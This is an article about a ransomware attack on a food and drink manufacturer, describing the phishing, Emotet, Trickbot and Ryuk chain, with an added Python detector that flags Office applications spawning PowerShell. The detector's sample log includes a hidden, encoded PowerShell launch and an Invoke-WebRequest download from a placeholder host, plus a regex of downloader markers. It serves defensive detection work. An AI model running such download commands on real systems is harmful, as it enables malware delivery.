By taking advantage of common security vulnerabilities, crooks almost got a big payday when a food and drink manufacturer fell victim to a ransomware attack. But crucially, the targeted business didn’t give in to the extortion demand.

The security experts who responded have given some insight into just what happened to the unnamed business as attackers took down the network.

Firstly, the crooks used a phishing attack.

Secondly, they were able to take advantage of a couple of weaknesses:

  1. Old hardware
  2. Default passwords

This allowed them to deploy:

  1. Emotet and Trickbot malware, and then
  2. Ryuk ransomware

before attempting to extort a fee from the victim to restore the network.

Subsequently, the organisation decided against paying the ransom and chose instead to hire security experts, who came in, examined the network and restored it to functionality within just 48 hours.

Bindu Sundaresan, the Strategic Security Solutions Practice Lead at AT&T Cybersecurity, confirmed “it was a targeted attack,” explaining that this particular organisation, like many, doesn’t have a security retainer or IT staff. So the common response is to “give in to the ransomware attack because they want to return their operations quickly.”

AT&T was the cybersecurity company that came in and investigated the attack. Most importantly, their expertise helped the manufacturer get back online without the big cash payout and with minimal disruption to production. However, it could all have been averted if basic security vulnerabilities hadn’t allowed the initial stages of the attack to happen.

To clarify, Ryuk, the ransomware itself, is only deployed at the last stage of a three-pronged attack. The other two prongs are Emotet and Trickbot.

Emotet began as a banking trojan before progressing into a botnet that is used to deliver other malware, in this case the Trickbot trojan.

Trickbot, in turn, gives the attackers backdoor access to compromised systems. From there it has the ability to move around the network, issue commands and steal additional data. It’s a powerful form of malware.

After that, the criminals download the Ryuk ransomware onto the network. The attackers know it’s the quickest and easiest way to make money from a compromised network.

It’s important to recognise that this attack started with a phishing email, whereas other ransomware campaigns start by targeting remote ports. Had the phishing attempt been recognised at the outset, the incident might have been avoided altogether.

To clarify this, Sundaresan goes on to explain that “a user was sent a Microsoft Word document as part of a phishing campaign. It was labelled as an invoice and this user downloaded the document, then malicious code executed a PowerShell command that downloaded an Emotet payload.” As a rule, users who don’t need administrator rights don’t need to run PowerShell commands either. That is to say, if PowerShell had been disabled for this user, the attack could have been stopped in its tracks at this very point.
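The chain Sundaresan describes, an Office document launching a PowerShell download, is also what a defender can look for in process-creation telemetry. The Python below is an added example, not code from the article or from AT&T: it scans constructed, Sysmon-style process records (the field names Host, User, ParentImage, Image and CommandLine, the pipe-separated layout and the sample lines are all assumptions of this example) and flags any Office application spawning a shell, raising the severity when the command line carries download or obfuscation markers.

```python
"""Added example: flag Office applications spawning a shell in process logs.

The record layout ('Key=Value|Key=Value|...|CommandLine=...') and the sample
lines are constructed for this example; the field names mirror Sysmon Event ID 1
but any EDR export that carries parent image, image and command line will do.
"""
import re
from dataclasses import dataclass

# Office binaries that should practically never spawn an interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters commonly abused as a downloader stage.
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe",
                  "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line fragments typical of a download or obfuscated launch;
# their presence raises the finding from medium to high severity.
DOWNLOAD_MARKERS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|iwr\b|net\.webclient|"
    r"start-bitstransfer|-enc(odedcommand)?\b|frombase64string|-nop\b|"
    r"-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)


@dataclass
class Finding:
    host: str
    user: str
    parent: str
    child: str
    severity: str
    reason: str


def parse_record(line):
    """Parse one 'Key=Value|...' record; return None for malformed lines."""
    fields = {}
    parts = line.strip().split("|")
    for i, part in enumerate(parts):
        key, sep, value = part.partition("=")
        if not sep:
            return None
        key = key.strip()
        if key == "CommandLine":
            # Command lines may contain '|' (PowerShell pipes), so CommandLine
            # is the final field and the rest of the line belongs to it.
            fields[key] = "|".join([value] + parts[i + 1:]).strip()
            break
        fields[key] = value.strip()
    required = {"Host", "User", "ParentImage", "Image", "CommandLine"}
    return fields if required <= fields.keys() else None


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(record):
    """Return a Finding when an Office parent spawns a shell child, else None."""
    parent = basename(record["ParentImage"])
    child = basename(record["Image"])
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return None
    markers = sorted({m.group(0).lower()
                      for m in DOWNLOAD_MARKERS.finditer(record["CommandLine"])})
    if markers:
        reason = ("office spawned shell with download/obfuscation markers: "
                  + ", ".join(markers))
        return Finding(record["Host"], record["User"], parent, child, "high", reason)
    return Finding(record["Host"], record["User"], parent, child, "medium",
                   "office spawned shell (no download markers)")


def scan(lines):
    """Run every parsable record through evaluate(); skip malformed lines."""
    findings = []
    for line in lines:
        record = parse_record(line)
        if record is None:
            continue
        finding = evaluate(record)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample records: one Word-launched hidden/encoded PowerShell, one
# benign scheduled script, one Excel-launched downloader, one Outlook-launched
# cmd without markers, and one malformed line.
SAMPLE_LOG = [
    "Host=WS-042|User=CORP\\jdoe|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -nop -w hidden -enc QQBBAEEA",
    "Host=WS-042|User=CORP\\jdoe|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -File C:\\scripts\\backup.ps1",
    "Host=WS-017|User=CORP\\asmith|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -c \"Invoke-WebRequest http://example.invalid/inv.dat -OutFile $env:TEMP\\inv.dat | Out-Null\"",
    "Host=WS-009|User=CORP\\bkhan|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"
    "|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd.exe /c echo hello",
    "garbage line without fields",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity.upper()}] {f.host} {f.user}: {f.parent} -> {f.child}: {f.reason}")
```

A rule like this is deliberately narrow: an Office process starting an interpreter is rare in normal use, so even the medium-severity hits are worth an analyst's look, and the high-severity ones are exactly the download stage the article describes.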

First, Emotet gained entry and a foothold in the network, forming the initial stage of the attack. Second, the attackers deployed TrickBot. This malware steals login credentials for corporate accounts and cloud services to gain access to other parts of the network.

Using just these two steps, Emotet and TrickBot, the cyber criminals had already gained control of over half the network.

Lastly, the nail in the coffin is delivered: the Ryuk ransomware.

Sundaresan goes on to say that “malware like this wants to get the most bang for its buck and go after organisations that are at the point where they feel like they need to give in due to the damage it’s costing to their network.” Firstly, because of “the valuable data that’s being held,” and secondly, they want to get back to work. “So, they have a sense of urgency.”

Thankfully, in this case Ryuk had compromised only about 60% of the network, including the ordering and billing applications. So it could have been much, much worse. In part this was due to the fact that the unnamed manufacturer brought in security experts to contain the attack.

Sundaresan explains that “the ability to contain it and the response time are vital, it really is the key to a quick recovery.”

AT&T contained it before it reached the crucial databases, so they were able to get the business back up and running within 48 hours, and without paying any large cash amounts to the criminals. Good news!

But consider: firstly, 2 days offline would still have cost the organisation money. Secondly, bringing in the security experts would have cost a fee as well. In addition, the manufacturer now has to think about security upgrades to its network so that it has more protection in future and isn’t attacked again, and that means more money again.

On the other hand, they probably would have needed to upgrade their security anyway. This manufacturing company could have avoided falling victim to ransomware by ensuring that its cybersecurity was managed well. Sometimes all it takes to stop an attack is fixing a few simple vulnerabilities: small protections that criminals can’t take advantage of.

For instance, there are organisations that still haven’t applied security updates, some of which have been available for a long time. Unpatched vulnerabilities of this kind are the ones that Emotet, Trickbot and Ryuk take advantage of; they’re easy to exploit.

Most importantly, as Sundaresan says, even though Microsoft has put out patches, patch management and security measures continue to be areas of concern within some organisations. Secondly, if strong passwords and multi-factor authentication had been used to secure systems, “this ransomware attack could’ve also been prevented.”

She says “a lot of this can be prevented. If they didn’t have default passwords and end-of-life machines, a lot of this would’ve been prevented.”

She adds that prevention is the best cure when it comes to cyberattacks, and the most cost-effective in the long run. These are a few of the benefits:

  1. It stops your organisation from falling victim to ransomware or other malware in the first place.
  2. The cost of securing the network in advance is almost certainly going to be less than having to do it in the aftermath of an incident.

An incident:

  1. disrupts operations;
  2. causes reputational damage that could keep customers away;
  3. could cost a large cash payout.

In other words, having experts secure your network and data might seem expensive, but it’s worth it. It is definitely worth getting the experts in to examine the network before an incident rather than after one. In this case we know it could have been so much worse.

Sundaresan recommends:

Firstly, get a security assessment done. “Security initiatives from compliance or internal testing – it’s not enough”, she says.

Secondly, get your network tested. She also highlights the need to “use multiple attack vectors in order to do it objectively with full penetration testing.”

Above all, ransomware will remain a problem, whether it’s Ryuk or something else, if organisations don’t put basic security measures in place. The threat will persist as long as organisations fail to act on security.

Gone are the days of thinking “it won’t happen to me”; too many organisations have fallen victim to criminal hackers. This time, the criminals didn’t get away with the loot. But it could have been worse.